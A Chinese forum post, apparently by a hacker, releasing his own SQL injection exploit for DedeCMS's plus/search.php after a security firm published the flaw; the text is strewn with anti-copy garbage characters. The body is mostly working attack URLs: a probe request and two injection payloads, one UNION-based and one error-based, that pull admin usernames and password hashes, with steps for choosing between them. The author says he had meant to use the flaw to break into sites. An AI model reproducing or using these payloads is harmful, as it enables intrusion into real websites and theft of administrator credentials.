转载不加作者名的没JJ% ^) n* K2 Y0 `# N7 f% {
+ x: b- ^2 u( y, e( |5 S
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
8 {( E" r1 S) B9 g
: a/ y$ @ n: G) N$ T: c5 I既然已经发出来了,我就把我自己搞的exp发下吧。。唉。/ E) L0 q0 i' @0 A1 Z4 P" Y
6 d# m& S( H/ Q9 t" f: T8 ~* h8 a$ G
我一般是这样测试的:7 Q/ `5 A' ?& K5 Y7 J
, o4 X3 h( f( q2 M1 B7 P/ ?7 _提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a# j0 u/ h& T* m; y
7 A. A9 M! n: W2 a( I+ V6 i8 o+ s
转载不加作者名的没JJ, q* L) J# y* _7 A7 V6 T8 U2 i
8 Y2 {. Y1 _3 A$ T3 b作者:鬼哥, A }3 i- z0 M; i
+ W7 m0 l) _: c1 i/ p5 n, N4 q5 K
( I( G1 ]; ` x0 n% b) J8 M% k
8 k; G. F0 ]/ v看结果如果提示# w( T; g# V z
V3 J& I4 U5 J1 h) q1 C
Safe Alert: Request Error step 2 !* z8 }/ [. R$ M7 u; T5 r* Z
' {; `2 V) k# W+ F: N# S! F1 e/ i
那么直接用下面的exp' {% G+ p4 V* Z, O1 A7 d
' T! R) j0 o9 b5 U1 T5 i
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
% L% ?+ [! H: ^' k; b C& J; A5 q
5 ^/ i, [! S! N- t9 o- U# [4 `
2 B4 y* C! K! f8 ?3 L+ x看结果如果提示
+ v; C) I+ e w+ Y
1 p4 g0 {& ?2 ~2 D5 ^& J4 T- _. MSafe Alert: Request Error step 1 !5 C8 ~- T8 r; W9 p0 z5 x2 _9 v0 @
4 d" u* C% O' p6 F8 u, J% K7 i
那么直接用下面的exp
5 B) y) `6 x5 W/ x6 k$ Q1 X% g! Y7 y( F7 E8 c
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
! J# R2 B- O5 f J6 h# S, o; v& {3 C5 t3 F
/ Z2 Q3 i; l# K
如果正常显示证明漏洞不存在了。
; P% @% i2 S" m4 y* p% [9 ? \$ C" {) z9 Y8 F& H+ I f
转载不加作者名的没JJ |